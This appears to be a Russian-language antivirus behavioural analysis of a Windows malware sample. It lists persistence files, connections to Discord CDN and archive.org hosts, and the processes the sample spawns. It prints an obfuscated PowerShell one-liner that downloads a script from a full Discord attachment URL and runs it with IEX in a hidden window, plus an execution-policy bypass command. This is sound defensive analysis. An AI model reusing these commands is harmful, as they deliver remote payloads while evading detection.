Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
- C:\users\public\run\run.bat
Изменения в файловой системе
Создает следующие файлы
- C:\users\public\microsoft.ps1
Сетевая активность
Подключается к
- 'cd#.##scordapp.com':443
- 'ia#####3.us.archive.org':443
TCP
- 'cd#.##scordapp.com':443
- 'ia#####3.us.archive.org':443
- 'ar##ive.org':443
- 'ia#####4.us.archive.org':443
UDP
- DNS ASK cd#.##scordapp.com
- DNS ASK ia#####3.us.archive.org
- DNS ASK ar##ive.org
- DNS ASK ia#####4.us.archive.org
Другое
Создает и запускает на исполнение
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -windo 1 -noexit -exec bypass -file C:\Users\Public\Microsoft.ps1
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''https://cdn.discordapp.com/attachments/822969559891705862/822969712476422174/ALL.TXT'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''https://cdn.discordapp.com/attachments/822969559891705862/822969712476422174/ALL.TXT'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X
